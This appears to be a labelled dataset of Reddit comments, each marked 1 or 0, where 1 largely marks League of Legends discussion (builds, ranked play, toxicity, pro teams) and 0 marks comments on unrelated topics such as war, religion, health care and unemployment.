1	I'm with Riot on this one. Should you get to keep the name that is famous because of a specific person when that specific person wants to use it? No. In fact the only reasons you hold any value with the name (that you put in your post) is because:     You've had it since beta.     It was specifically used by someone who is/was famous.       Your first objection is completely fine, I myself would be pissed if they randomly changed it, but the only other reason you have any value in it is because it is the same name that the famous person took. Without their use of it, the name is just another name, albeit somewhat cool.   Let's say Riot's servers are a town. Now lets say that Ghostcrawler is a reaaaally famous person. Now lets say that no one really knows what Ghostcrawler looks like ((like Gatsby), so when you say "I'm Ghostcrawler!" they believe you. Then the real Ghostcrawler comes along and starts trying to claim his rightful name but everyone says "You're not Ghostcrawler!"   So now, lets say that you and the real Ghostcrawler meet. He can prove he is the real Ghostcrawler and you can't. Are you going to pull something like on of those fake celebrity facebook pages or are you going to admit you aren't the real Ghostcrawler?
1	Not to pick on you but I'm going to tell you why you are wrong.   > TSM makes multiple times more with just ads than the prize pool. This really is unacceptable   The prize pool disclosed so far just for this year is $100,000USD. That's money in the bank that will be paid out for tournament wins.   Lets look at a massive LAN over several months and compare shall we.   OGN Summer has 16 teams competing. Their total prize pool is about $117,000USD. They have multiple revenue sources like tickets to get in, broadcast TV rights and advertisement revenue, apparel, publisher subsidies, outside technical support, etc. They are also able to leverage economies of scale that come from being OGN and Korean eSports.   Oh ya they also charge for non month old VoD access.   Under the free HD model as was disclosed by Dan Dinh, SoloMid was losing money with each tournament. This was with paying one caster and Dan doing the work on his own. As much as we love Dan's one man casting ability we don't want him to suffer as he did then.   SoloMid wants to do good by the community that means not only having a watchable stream, but having great competition, supporting LoL's casters and teams that win. Some of the past winners of SoloMid's NA Invitational series have used their winnings so their unpaid managers hotel, airfare and other accommodation expenses were covered and they could go to LAN events.   Any streamer under the SoloMid banner keeps their streams revenue. SoloMid does not touch that money. So people thinking SoloMid takes from TheOddOne's or Dyrus' money as you seem to be is wrong.
1	I play as master Yi against him.  I just play really passively till he gets ballsy then wreck his face.   I'm not very good as a player yet, but that works for me.  He's tough at high levels for me though.  I just let others engage him for like 5 seconds and melt his face after his mana or CD's are down.
1	Some good thoughts, but in my opinion Ashe is fine where she is right now. She is a situational AD carry, because of her incredible amount of utility.   Her ult allows her to synergize incredibly well with champions who also have global ults. For example, and team comp consisting of TF mid, Noc jungle, and Ashe/Taric bot has an  enormous  amount of CC, and the ganks are a guaranteed kill. Same thing goes for Karthus mid, or Shen top/jungle.   Of course, she doesn't do as much raw damage as carries such as Graves or Corki, but she makes up for that with her ult, free CV, and perma-sow.
0	Currently they're pushing the medications? I'm pretty sure that's only a select few. I know from personal experience that if there's even a chance they push non-stimulant ADD/ADHD medication well before Adderall, which needs to be prescribed by a neurologist/psychologist.
1	There was a game I had about a year ago. I was mid (Lux) and I luckily got really really fed and farmed up. Our AD carry (Tristana) was also fed and farmed as F*** and kickin ass and taking no names.   I cannot remember who anyone else on our team was, only that the tristana did nothing but split push late game leaving us to 4 vs 5 fights which we would lose. Tristana would then die to a 3 man gank whilst pushing top or bot whilst the other two chiseled at our towers.   I vividly remember literally begging the Tristana for just one team fight with all 5 of us from 30:00 minutes in the game to 1 hour and 15ish minutes where we eventually lost a team fight at our nexus towers with tristana pushing their bot inhib tower. They just destroyed the nexus with Trist still top. Our team was so ahead it wasnt even funny but they just kept trading kills with us until they were successfully able to 5 vs 4 us.   This game still haunts me so much I get chills watching Shen split pushing. Every french person reminds me of him also.
0	I never really watched it before until the end of past season. I wasn't crazy about it but it was something to watch. Now I can't wait for each episode that comes out.  The wait for the next episode IS agonizing, but it does keep me regularly tuning into the show, and I guess that's what amc wants from it.
1	Mf buff is good but not great. Caitlyn is still there, ez is still there, he just needs to snowball hard same with sivir same with jinx, which after ADC nerfs it's pretty hard to, draven is a draven story; Draven Draven Draven Draven Draven.*
0	I'll help, Christian here. One of my hobbies is boiling down what Christians believe into their most unbiased forms. I like doing it to point out just how strange our beliefs actually are. In my experience the simple ability to not lie to myself, or sugar coat my own beliefs, helps me speak with people of other beliefs in a much more understanding way.   So here goes:   At its most blatant, without any sugar coating, yes. We believe in "black magic". By "believe in", we mean to say we believe that it exists and is a malignant force on our world. And by "black magic" we mean attempting to affect the physical world using the spiritual world through a demonic (read: not God-based) source.   Yeah, we believe in another universe that is mostly comprised of "spiritual" matter that can't interact with our realm other than in extreme situations. And we believe there are malignant forces who oppose us/mean us harm that attempt to manipulate us that exist there.   Opposite that, we also believe that good spiritual forces exist called "Angels" and the "Holy Spirit" which act as guardians/messengers/warriors/muses/guides... etc who help us in our day to day fight with the enemy.
1	Yo wall of text inc.   Basically think about the game in terms of towers and map pressure, champions are merely resources just like minions are. When the enemy team utilizes resources for a 4 man gank on bottom lane, you have to make them pay for it by taking a turret or possibly 2 from the other lanes. A lot of the time (and I have seen this all the way from gold to diamond games) in soloQ they will expend a lot of resources for a gank or a dragon attempt and people will just freeze their lane.   Literally, freeze their lane and complain that they did so well in cs but still lost. You lost because you didn't apply pressure, you lost because you were a resource that wasn't being utilized. When a team can successfully utilize all 5 of their champions in an efficient way, they have a very large chance of winning regardless of mechanical skill.   This is also why aggression is very effective in soloQ, if you can shove to the enemy turret and harass your enemy or kill them AND draw jungle pressure then you have drawn 2 resources to deal with your teams 1. This opens up opportunities for your other lanes to be aggressive, your jungler is free to counterjungle, you have a chance to take dragon or baron depending, and pressure turrets.   Also another thing that people forget is that even if you are up 50 kills on them at 50 minutes in, if half of your team gets caught or even just one or two of you, you will lose inhibitors, baron and quite possibly the game. It doesn't matter how fed you are unless you trade your life for more than what it's worth (2+ champions at that game time or an inhibitor basically)   Another thing, I was watching Hotshot's stream one day and he said something that really resonated with me: "Any time you aren't farming, getting gold or denying your opponent you are actively losing your team the game". This idea completely blew me away but it made perfect sense. All those times you wander mid through their wards to try and gank, you are losing your team the game. All the time it takes to walk back to lane is time wasted. All the free autos you didn't take on your enemy was wasted gold. Every time you walk through the jungle and don't take the camps along the way is gold being thrown down the drain.
0	So this post is about people knowing they are ruining something and then blaming it on someone else? Yeah sounds about right. If you don't like the price take it to a laundry mat. That price is probably that high because students kept ruining washing machines and bitching that it costs $2 so now it's $6.50 so they can buy new washers after you ruin them.
0	I feel awkward looking at this. I felt the opposite, and this turned out to be true. I thought I was only kinda cute (still feel that way) but it turns out that lots of guys liked me. And people think I'm rather attractive. -shrugs-
1	NO!!!!!!!   God, sorry for the exclamation points but I really think that the word "addiction" is hideously misused in modern times.   But really, if you enjoy the game, play it! If not, find something else to do. I enjoy playing the game (win or lose) and I rarely find myself actually raging.   Last night was a great example of a bad game that turned around. Early game we got stomped, and one of my teammates was quick to bring out the nerdrage, blaming me and the rest of my teammates for this and that and spamming "report" in all chat.   We stayed in the game for 50+ minutes and we ended up winning after I got a pentakill in the opponents fountain.
0	I think much of the anger is coming from the fact that they let it wriggle there, in obviously horrific pain.   I understand shooting the dog in self-defense, but you follow that up, if it hasn't been a mortal shot, with a mercy bullet in the brain.
0	I am a recent grad that is white, upper-middle class, relatively connected in my community, and graduated in the top 3% of my business college from the largest university in my state.... I am still working for shit pay at the company that I interned for because I couldn't find anything better. If you don't have experience, you don't have shit.
1	Become confident with one champion and try to get that every game.   I, for one, am very confident in my Ahri, and I like to make myself get in the mindset of picking her and banning morgana will result in me carrying my team to victory. I'm currently at 1600 Elo, with a 85% Ahri win rate. Never lost lane, only lost games where there was a Morgana on the enemy team. Seriously though. Fuck. Morgana.
1	No.   Imagine this scenario: You are in challenger, placed #33. Your MMR is, let's say, 2750. However, someone in challenger is having a slump! His name is SlumpGuy and he is on rank #50 with an elo of 2600.   A lot of people are spamming ranked games near the end of the season. As it turns out, you just need a higher MMR than SlumpGuy to qualify for challenger. The flaw is that multiple people can get a series off of slump guy. There's 40 people who hit an elo between 2600 and 2680 now! Those 40 people are potentially getting series off of SlumpGuy and a few people above him, only 5 or 6 people at max. 21 of those 40 people win their challenger series. This now means that ranks #29-#50 are now occupied by people who have 2600-2680 elo. You are OUT of the league, even though you had 2750 elo, meaning you had a higher MMR than those people.   "No problem", you say - "My MMR is still higher than them, so I can get back in by playing a series" - Nope. You can't. People with MMR even higher than yours got kicked out of challenger and you have to get even higher Elo than rank #28 to actually qualify FOR RANK #50. This is because of the immunity period.   All in all, it is very possible and does happen right now that you lose your challenger spot to someone who has lower hidden elo than you. This should not be the case and this is why the system is flawed. (And, for example, BoxBox had a slump in challenger during his immunity period. This immunity period ended recently and a ton of people got promo series off of him - yes, this is actually happening.)
1	Yeah looking back on that I think Doublelift didn't need to heal, but I'm just a Platinum level shitlord.
1	I feel that someone is more of a team player if they support out of any pick that isn't 5th pick.  I'm totally fine supporting from any pick if everyone on my team says that they have a position they're best at, and I'm left with support.   I recently started duoing with my roommate who's about ~40 elo below me, so he's always last pick.  He's a really good top and that's why we wanted to start duoing, so I could jungle, he could top.  Instead, he's left supporting every game.  One game he tried asking for top in the lobby, our 3rd pick takes gp top, feeds darius, going 0/8 in the first ~15 minutes.  I know my roommate is better than an 0/8 top and would not have lost that lane that quickly.
1	In my opinion, the only way to get out of the addiction is to get insulted and flamed so much, that you uninstall out of pure rage. Or, if you're a calm person like me that never rages, just uninstall the game when you know you have a problem. Then you have to install it again, that takes time though, and leaves you with less games played. I think that's the solution. In fact, I'm going to uninstall it right now...
0	I don't know what to tell you, then. The mentality exists and there are plenty of people willing to believe it. At my school, everything was blamed on race. A black kid stole a laptop and got suspended? Racism. A white kid made the highest grade on the test? Racism. Disregard the 3 black kids in the class's top 5, the black-only scholarships, and the white guys who get busted on possession.   Being white made you a minority and whatever stereotype they came up with for you. If you were white, people automatically assumed you were rich with a nice family even when most white kids in the area lived in trailers and a significant percentage had one-parents homes.
1	This one should be easy.
1	While I think Bruisers are becoming a little too stong, myself, I don't think it's the end of AP carries. We could easily send them botlane where they would demolish an AD carry. Especially since the meta has changed to aggressive supoprts, many of which lack a heal. Sending perhaps lux bot lane would stop any sort of aggression quite well while also allowing for quick burst against an AD carry. The AD carry and support could then jungle instead, allowing for a quick farm up, buffs going to the lanes, and nice ganks from maybe a leona stun from the bush followed by a corki burst with a bruiser there as well to top off the damage. In my opinion, I think this could lead to a radical change in meta which would suit the roles of current champions quite well.
1	Ill probably get down voted into the ground, but this is the second popular post I've seen where players are complaining about new summoned icon changes. Now I could understand if it was something relating to hurting the game play or hurting the interface, but honestly all these changes are doing is giving the summoner spells a new look for the season, they have been changed in seasons past, and there is really no reason to change them besides personal preferance. I don't think its something that needs to be changed, nor do I believe Riot should really make these changes. (even though Riot is a great company that is really good at paying attention to the needs of the players, I just think they have better things to do)
0	the air in the bag is not just air but nitrogen.  they flush the packages with nitrogen because it is inert and will keep your chips fresher.  nitrogen, unlike oxygen, does not interact with the unsaturated fats used to fry the chips and will stave off rancidity.  unsaturated fats are more susceptible to oxidation because of the double bonds in the fatty acid chains.
1	Well for the point of the discussion. You can actually outrun a Nautilus ult. If you do it with nocturn But I'm not sure how it will work with TF. But basically I think if you can outrun it for about 5 seconds or something (not sure what the exact thing is, but is a number of either ticks or seconds) it basically just fizzles out or explode on da spot. Not sure what happens but you can find find youtube videos of someone attempting it.
0	Happy to help but I don't agree with your
0	I've been watching Master Chef Australia for a while now. Completely different experience, everyone's happy for each others' success, helps out if someone's in trouble - and I've NEVER heard anyone bad-mouth anyone else on the show. Seems like a bunch of genuinely nice people helping each other to reach their potential.   All the back stabbing and alliances have turned me off most reality TV. In Master Chef (US, and to some extent UK) and Hells Kitchen seems just full of entitled, delusional, conniving bastards ("I don't care what the judges think, I KNOW my food is the best!", "It made me so happy to see her mess up her dish, she doesn't deserve to be here like I do", etc.).
0	A while ago, my friends and I found a way to get onto our high school's roof (just like in Anime!) so after a few lunches up there, we decided to try and spend the night.  After I made the preparations, my friends decided to bail on me to go to a party and so I decided to stick it out on my own.  Around 4:00 a.m. the noise of traffic on a highway woke me up and I decided to climb down and sleep in my car until later in the day when I would head home. I drove to my neighborhood and parked my car on the side of the road and went to sleep in the back seat.  Que banging on my window.  Some cop was there about to bash my window in when I opened up the door.  He started questioning me as to why I was parked in my car and why my eyes were bloodshot.  I asked him what time it was, he said 6:30, so I responded with something like "it's 6:30 and you fucking wonder why my eyes are bloodshot."  I didn't get ticketed, but the asshole kicked me out of the neighborhood so I just drove around and went back to my house after he stopped tailing me.
1	This is what happened to League of Legends in general. The game grew over and over to the point where there is so much people playing the game that the community is itself a "sample" of the world.   Now as much as we know, people with destructive or careless attitudes will always overwhelm good criticism because it's way easier to write a one line flaming comment than taking time to write something useful.
1	Not meaning to be a dick here but this is already Ro8 so...   Now on a serious note, I think the best solution would be merge both teams to make a really competitive one and another who could work as a nice sparring while developing new talent.   My best guess would be keeping Shy as top lane and Flame to mid (several times has been stated that he wrecks Ambition there) I've been liking Daydream so he should be in jungle. With both Madlife and Space on bot lane. While many show no respect for Space I find him to be the most consistent player on Frost (even more than our beloved GodLife). That team would wreck many teams, the thing is that SKT T1 K and KT Rolster Bullets are way beyond the other teams, the champion of Winter should be the winner of that semi, anything else would be an upset.
1	From the op: "I will post some questions directed to professional players. Anyone can respond, but I'd love to hear from the guys who set the pace".
1	I normally ban alistar, shen, and one of the "op" champs since I know 99% of the time, the enemy captain will ban the rest for me.   But that morale boost is so true! People can't lane vs nidalee in my elo and so any time I'm not vs rumble, I just hate laning vs him until I'm 6, my confidence is super high and I rarely do not carry the game. Also showing confidence is contagious, not every time of course as some people will never be convinced that there is a chance of winning once they start bitching before picks are even made, but most of the time my confidence with carry over to the rest of my teammates and we'll faceroll.   I've given first blood many times and been like, don't worry guys, I have wards now, I will now get a double the next time the jungler even thinks about coming to my lane. And my teammates will not harass me, will support me, and I'll back it up.   One game I played today I gave up first blood, our jungler wouldn't stop screaming in all chat that it's gg. I politely says, don't worry, I will not die in lane anymore, I will win us the game, I promise. He shut up. The enemy jungler then came top with the mid, our mid didn't call mia but I had good enough map awareness to know what was happening, and they tried tower diving me at half health with their top.   I got the triple but had to burn flash in order to juke them so I wouldn't die, and immediately after our jungler apologized and I ended up only dying that first time for first blood the entire game.
1	This design is just wrong, down to the core:   There are too many possible effects and combinations from the abilities. Just list all the stuff Lee Za can do:     A conal attack that shreds both defenses, possibly reduces damage dealt by targets hit, and reduces cooldowns.   A leap attack that can slows, and possibly amplifies damage dealt, immobilizes targets hit.   A point blank AoE attack that applies a dot, possibly reduces healing and regeneration, and amplifies damage.   An AoE attacks that slows, and possibly knocks people into the air, then deals further AoE damage.     Also, not only are these base abilities overloaded, Lee Za also gains free stats, further increasing her scaling with levels:     Health regeneration.   Movement speed.   Damage amplification.   Energy restoration.   Cooldown reduction.   Attack Speed.   Attack damage.   Ability power.   On-hit true damage.   Armor.   Magic resistance.     Basically, Lee Za needs no items, only levels to function as an assassin-carry-initiator-caster-tank-disruptor. Heck, even if her abilities had no scaling at all they would be OP.
1	It does not get better, the nature of this game makes people angry and act irrationally. The fact that you have to rely on 4 other people in order to win brings out the worst in people. Combine that with internet anonymity, and you get a pretty toxic community. Of course there are a lot of nice people playing the game, but the ones who shout the loudest tend to be the ones who get the most attention.   There is the tribunal and the Riot team to deal with reports. Unless you actually did something wrong, do not worry about people threatening to report you, you cannot be banned for having a bad game.
0	I won't say that you're one hundred percent wrong, but we probably would be anyways. Politicians would still make the decisions to send the armed forces to war for various reasons ranging from political, to financial, to maintaining american interests. Sometimes american interest are a little too complicated and nuanced to be explained easily. Part of the problem though is that America tends to think that almost everything is in its interest. Then theres also the fact that America still believes in containing communism/promoting democracy and capitalism worldwide. It's also very willing to take steps to protect those interests. Some of those steps are "legal" and some of them aren't.    To get back to why we'd be in Afghanistan theres a lot of reasons that we are there dating back to the 80's and Russia's invasion of the country. All of those aside (there is simply too many to get into here. Here's an article if you're interested  and also  more specifically) we'd still be there. America likes war. We're war mongers with bleeding hearts if you will.  It's good for business. ( We have the largest defense budget in the world. Think about that for a second. Do you ever buy an expensive toy then don't use it?    There is also the fact to consider that we would be there because the American government gets you on board with going to war. They are so good are manipulating the American people they get you to beg for a war. They get you to want it. In at least four of the past seven major conflicts America was involved in the American people demanded it. In WWI there was the incident with the RMS Lusitania ( in WWII there was Pearl Harbor ( Vietnam had the Gulf of Tonkin Incident ( Operation Enduring Freedom had 9/11. I'm not saying any of these were caused by the government, but all of these definitely have some questionable circumstances surrounding them. After all of these incidents where American citizens were killed we demanded retaliation. Do you remember the rise of patriotism after 9/11? Most of the people couldn't find Afghanistan on a map or tell you anything about Al-Qaeda, but we were damn sure someone was gonna pay. Wether it was all orchestrated or not is not what I'm debating. What I'm saying is we'd still be at war with someone if it wasn't Afghanistan.   I am a veteran of four years in a combat arms unit. To be honest I can't even tell you if I agree or disagree with the wars we're currently in. I'm torn because we are helping some people and bringing stability to some areas and genuinely improving their lives. But, I've also lost some very good friends to these war and a lot of soldiers and civilians have died.
0	I should retract what I said about not respecting suicide bombers. I do respect them. just not their cause.   War happens for a variety of reasons. But no individual fighting soldier(keyword:soldier, not a staff officer that never touches a battlefield) is the cause of a war. You may have to kill him. But you dont have to hate him. In fact, you SHOULD, as a soldier, respect the other soldier. Its customary to give enemy soldiers proper burials when possible.   The kamikaze and suicide bombers are giving up their lives(not risking losing it, actively giving it away) for a cause they truly believe is just. They were one army fighting another. They did not hide amongst their civilians(talking about the kamikaze's in particular here). They were in clearly marked planes. They werent hiding. They were coming. And their target was fucked. It wasnt pleasant. But it was fair. Japan really had no choice but to enter the war. The US had cut off trade because of their alliance with Germany. It was fight or starve. The pilots' families were taken care of for their heroic deeds. Can you imagine training for months knowing you had 1 specific purpose?   The sectarian suicide bombings follow a similar pattern. Only they do not represent a nation. They represent an ideology. The individuals who blow themselves up are almost ALWAYS 1 of 2 types of people: they're doing what they believe is "right" or they're being extorted/bribed. So they do it for the welfare of their families or they do it for something they believe is much bigger and much more important than themselves. You'll never find one of their commanders doing it, obviously. What makes this horrible is what exactly they're blowing up. A seemingly harmless man all the sudden explodes and a school full of little girls has to die because some people think its immoral for a woman to learn. THATS likely why you cant respect it. forgive me if I am wrong. You have every right to correct me.   You've probably read a thread or 2 on reddit before about suicide, attempted suicide, suicide survival, etc. You've heard what an incredible amount of courage it takes to pull the trigger. While you may not agree with the reasoning or the suicide itself, you have to respect what it took to actually do the deed. Its not something YOU could just do like it was nothing, after all.
1	I'm currently [a D3 ADC main]( and the following is my opinion on the changes.     I think double lifesteal builds will become more popular. Every single lifesteal item had it's lifesteal values nerfed. People like C9 Sneaky already frequently use double lifesteal, this new patch just solidifies the idea.     I would keep an eye on Caitlyn this patch since she will be able to have more presence after her powerful early game due to the attack speed buffs. Twitch is getting nerfed this patch which I feel takes him down a notch on the tier list. His Q, which was already a fairly weak escape compared to most ADs, takes way too long to charge up to make it a real escape now. All in all though, I think picks will remain generally the same..Though we may see the return of some hypercarries since most of them benefit greatly from attack speed which is getting buffed. Corki and Lucian will be very strong picks in my opinion since they both can effectively use the double lifesteal build(BT -> Triforce -> LW -> BOTRK). Note that ADCs that build BOTRK first will likely not build double lifesteal.     Not really in my opinion. Mana isn't a very big concern lategame for ADCs typically, so this would be a early game item, however, the stats it provides VS getting something like a bloodthirster isn't worthwhile. I don't know, this item just feels so underwhelming in my opinion though. It's a completely sustain based item that doesn't provide as much damage as other items.     People are overestimating the bloodthirster change. It's a nerf. The shield is actually really small, much smaller than I think people are imagining. I think that what will happen this patch is that double lifesteal builds will be very common, which means a decrease in damage due to lack of IE..however, the buffed attack speed makes up for it slightly. I've only played a little on PBE and I'm very 50/50 on these changes.       Edit : Here are my thoughts on  Ezreal  as well, since he's my favorite champion and this thread is hyping him up a lot.   He still has the same problems as before. If you're running the typical mana-adc setup(which is basically a standard ADC page with 4 mana regen glyphs in place of MR), you don't actually have that many mana issues in lane unless you're spamming. The item does help him mid-late game since he's actively using his spells in that time, but even so, building this early sets your damage extremely far back. As for Blue Build Ezreal, it has a chance of coming back, but the problem is that blue build Ezreal is even worse of a laner than the standard Ezreal lane. This means the enemy ADC can either bully you so hard that you don't have time to scale, or a pick a hypercarry with a free lane.   Edit#2 :  Kog'maw  this time.   Kog'maw is definitely was buffed in this patch. His standard build as of now(BOTRK->Triforce->LW->IE) got buffed really heavily. Attack speed as a whole was buffed, therefore Kog'maw does a lot more damage. BOTRK's passive damage was buffed, but it's active was nerfed. IE was given more flat AD, which isn't huge on Kog'maw but everything helps. All in all, Kog'maw will be doing insane damage but he'll require a team that can peel for him.
0	Wow, that's some serious shit.  Now that you told her, cut her out of your life.  She's too toxic.  If she ever changes, great.  If not, it's on her.  When you see her at family occasions or out somewhere, acknowledge her like you would a distant neighbor.  Keep conversations polite, simple, and superficial.  It sucks being a loved one of an alcoholic, I know from experience.  If it really bothers you, there are Al Anon meetings for family and friends of alcoholics, where you can connect with others in your situation.  It might be a good idea for your parents to go too.  They'll get support and suggestions on how not to enable her and how to not be codependent.  Good luck!
0	I am currently a senior(really a junior ish since I actually graduate in 2 years) who switched my major a few times due to not knowing what I had to do. Maybe it doesn't help you but I know I sure as hell felt like I was the only one who didn't know what the hell I wanted to do and it was nice when I realized there were others just like me out there. This will be long so feel free to just skip it if you want.   The biggest thing to me was I graduated from high school early but had no idea what I wanted to do but I knew I would have laughed in my face if I told past me where I would be now. When I turned 19 I decided to enroll in college nearby where I lived based on a friends suggestion, a very small university that was a community college about a decade or so before. I didn't know what to major in but knew I wanted to help people, so I chose pre-med(I know I know), I just knew I wanted to be a surgeon. Mind you I had no pre college counseling, I am the first person in my family to attend college, and I had no idea what the hell I was doing. Well the first semester goes great, grades are amazing and I look forward to it. I am recommended that I talk to some local doctors in the town I and see where my path would take me.   Basically what I got from them was, you make a choice: either you choose your career, or you choose your family, but you can't have both be awesome. Obviously this is not always true, but it struck a chord with me. See, I had always grown up with a tight knit family. I knew that I wasn't willing to sacrifice my family for my job, I knew I needed to change my major. So at the end of my spring semester I changed my major on a whim to computer science. I have always liked computers so that should be great right? Wrong. Don't get me wrong, I love programming. But I don't want to do that always everyday as my only job ever. I go for a year as a comp sci major, I do well but I know my heart isn't in it as much, and as such my grades begin to slip.   On another whim I decided to transfer to a local big name state university.  I decided to try electrical engineering. I have no idea why because I never saw myself as the "white collar engineer type". At first I wasn't so sure about it either, I mean what the hell are things like signal processing etc? Well I decide to give it my best shot, at this point I am fairly depressed about my future and have no idea what to do with my life. I get in and begin to take my intro level classes and let me tell you it is tough, but it seems so much easier than anything I have ever done because I absolutely fall in love with it. I love it so much that I wish my education didn't have to end. My grades have shot up and my "major" GPA is much higher than my overall which I am told is rare for engineering majors. It may not be the best school but I can't wait to go to each class. I have always been one to skip classes and not always go, and since I have been here I have no skipped a single class(barring illness) and I have been in the program for going on my second year. I can't wait to continue my classes and I love everything about it, it is absolutely fascinating to me. The whole point of this whole story for me was really to try and get across that it's not just you who has no idea what they want to do, and on top of that try new things, you might be surprised what you fall in love with.
0	I would love to be able to poo standing up without messing myself. I'm not talking about squatting over the toilet either. I want to poop standing up just like a horse does it. They can even poop while they're walking, or even while pulling a cart down the middle of main street.
0	You must be from Europe. Most people from the United States do not have, nor do they need, a passport. If Americans want to visit some place 2000 miles away, all they need is a plane ticket or a few days for the drive. If Europeans want to visit some place 1000 miles away, they probably need a passport, and at 2000 they will need one, unless they're Russian and want to visit Siberia.
0	When I worked there in 2007, it was absolutely awful. I hated having to push so many unwanted products on people who really just wanted to buy whatever they had in their hands already and leave. "Oh, I know you just wanted this game, but have you thought about getting this subscription? No? What about preordering this game? No to that too? Well..."   It was mind-numbing. I wasn't too huge a fan of constantly trying to rearrange the games that some knucklehead kids would come in and fuck up.   Being paid by way of a company debit card sucked too.
0	Yeah, I understand and you're right about the credit. (Though generally I don't care about karma, so that's whatever.) I'd rather just provide something to maybe get a small laugh or smile out of someone. I mean, like half the people on reddit don't read comments anyways and may have missed out on this.   Problem is, I was on mobile when I posted and linking neatly in comments is a bit difficult on my phone; I left the post for later. I came back to it right before it exploded and saw /u/americon commented about his post, so I said that was where the idea came from. Thought all was well and left it at that.   Nope. Guess not. I come back and see people are upset and someone has provided a link directly to comments which I had read. At this point I realize the former action wasn't enough, but whatever, there's a link now; I thank the link provider and move on with a joke. Everything's cool now I think.   Nope. Nope again. People are still upset at this point, but I guess there's nothing more I can do now. Ah well, kindness can only go so far before it gives up. I've still upvoted all the comments here for contributing to the discussion though, so I've got that going for me.
0	No, I don't. I think the cost of health care is a bit stupid. Having kids was one of the best decisions I've ever made in my life. I think the fact that two parents can work hard and make their employers a ton of money, yet still can't afford something as basic as health care is the problem. Employers who expect loyalty, and employees who care about the financial well being of a company, while they don't give a damn about the financial well being of their employees are the problem.   I can provide food and clothes and shelter and even a few extra luxuries for my children, but I can't do any of that while paying 63% of my income to a health insurance company. You think the solution to the problem is for people to stop having kids until they can afford the insanely  inflated cost of living on ridiculously low wages, but it's not. Nobody in their right mind is going to plan their family around government policies that were written for and by rich people.   If you are worried about your tax dollars going to pay for welfare then maybe you should be fighting for higher wages or higher taxes for employers that don't pay enough to keep their employees off welfare.
1	I recommend building WildTurtle as a standard AD Carry, opting for armor seals, armor penetration glyphs, and flat attack damage marks and quintessences.   Start out with a Doran's blade or a long sword and two health potions, depending on how ballsy Xspecial is feeling. Pick up a pair of berserker's greaves and aim for a bloodthirsty or infinity edge by mid game, eventually building a phantom dancer and last whisper for  tons of damage.
1	CURRENTLY HAVE A 1225 CHAT RESTRICTION GAMES OUT OF 1435 AS TOTAL PUNISHMENT.   As the the name says, I created this just to comment on your post. I usually just lurk and read stuff like this, so what I have to say about this topic really means something to me.   First of all, I want to say one thing to all those people crying about toxic League community all the time to shut up and get that stick out of their asses. It's a lame ass trend that kids are just farming around.   Sure, there are those people who find joy is bringing agony to others and deliberately being annoying, but that's not everyone. There is a reason why a person would flame or use hate speech. In my case, it's usually when I'm losing a game. Unfortunately, that's been happening a lot lately. I'm not claiming to be better than everyone around me, but when I'm constantly getting matched with a team and a score of 10-0 by the first 8 minutes, it starts to take its toll on you. Now one of those smartass readers will say something like "HURDUR U GET MATCHED WITH PEOPLE SAME SKILL AS U." To those, I say that you really have no clue what you're talking about.   Many times I'd get matched with people who are like 0/3, engage a fight against their opposite laner and end up putting something as silly as a 'XD' face in /all chat after dying for the fourth time. THAT sort of crap pisses me off to no end. THEY ARE MORE THAN HAPPY TO FEED, BUT GET PISSED AT YOU WHEN YOU ASK THEM NOT TO AND START THROWING WORDS AROUND LIKE "U SUK". Many people would say to just mute them when that happens. But does muting them stop their feeding? No, it doesn't. It reaches a point where you just don't give a crap anymore and you want payback because they have just cost you a game, so you start swearing at them. The worst part is that the rest of the team sides with them, and that's if they aren't already part of a premade (which is often the scenario in my case) and you'd get at least 2x reports.   This is the issue I want to bring light on here. The assholish behavior does not get punished, while people like me who only swear/get offensive out of frustration or being provoked do get punished.  I believe Riot needs to look at the source of the problem and see why people would behave like that other than just instantly punish someone whose logs show the words 'Fuck you.'   I play this game because I like it; I don't play it because I want to antagonize other players.  When you start reporting premades every other games, the system doesn't take your reports anymore, so when someone tells you to get 'cancer and die' for asking them to stop feeding, all you can do is just reply at them in the same manner even though you know you'll be punished for what you're saying and not them. I'd like to make it clear that I've never wished anyone death or any illness in game, though I do receive those sometimes.   I'd also like to mention that when I do get a good team who takes the game seriously and do put in effort and not just troll and ruin the game for me by feeding or so and using that lamest excuse of them all 'it's only ranked', I do actually honor them post match.   I'll also admit that when I see on /all chat the opposite team's jungler and support asking for their ADC to be reported for being offensive, I usually side with him when his support makes stupid plays and his jungler gives him no ganks when ours is constantly ganking him because I feel for them and know what they would be going through.
0	I had a stint in unemployment a while back.  The challenge I faced was that I basically ran out of things to do.  40 hrs a week of job hunting is something you can do for 2-3 weeks.  But if you're in a specialized industry you'll run out if opportunities really quickly.  Then you just fall into maintenance mode where you only have maybe 15-20 hours of work doing the networking and monitoring job boards.  Some reading and professional development is important to keep yourself current.  But there's only so much you can do to fill your time.
0	But still without a source? Amazing!   Do you have one, or is this normal Internet warrior work?   I'll even accept your claim that 10-15 happens on a statistically significant scale if you can prove it with a source other than "My ass" or "Maths". The data is out there, show me a percentage above say 3% of families having 10+ TANF recipients under 18. I would consider 3% a good margin of "Does this happen in any meaningful way." Can you agree to that? I won't be specific on whether it's per person / group (individuals receiving the assistance) or per dollar spent within TANF.
1	In the current state of the game health is incredibly overpowered as a result of all the ArP. If you watch top tier players you'll basically see them build anything that comes from a giants belt.   For me personally I've made warmogs my primary defensive item, it will stop the enemy from 100-0ing you in a few seconds and then providing regen while you kite the bruisers. When the build it really varies, I tend to build it as my 3rd item (after BT/BC, ID/PD, etc.) but you need to decide whether its required.   I'll take my last game as an example as it was rather close. I was MF (with a blitz, lee, katarina, kha zix) versus a renekton, lux, sivir, blitz, skarner. Our kha zix fed renekton while I was picking up good money at bottom. I had a BC/BT while renekton had a BC/warmog, my entire team dives in while renekton storms at me, he tears me apart before I have the chance to peel off. So I buy a warmogs, first you get 400 hp from the giants belt and when you finish it this goes up to 1000. Now I'm able to survive his burst and start kiting. Allowing my team to clean up and then help me with renekton. The extra hp gives your team the time to react to what is happening and act accordingly.   Sometimes your team will have a load of aoe cc or their assasins were camped by your jungler and you can just sit back and shoot then it's not necessary to buy a warmogs (yet).   So
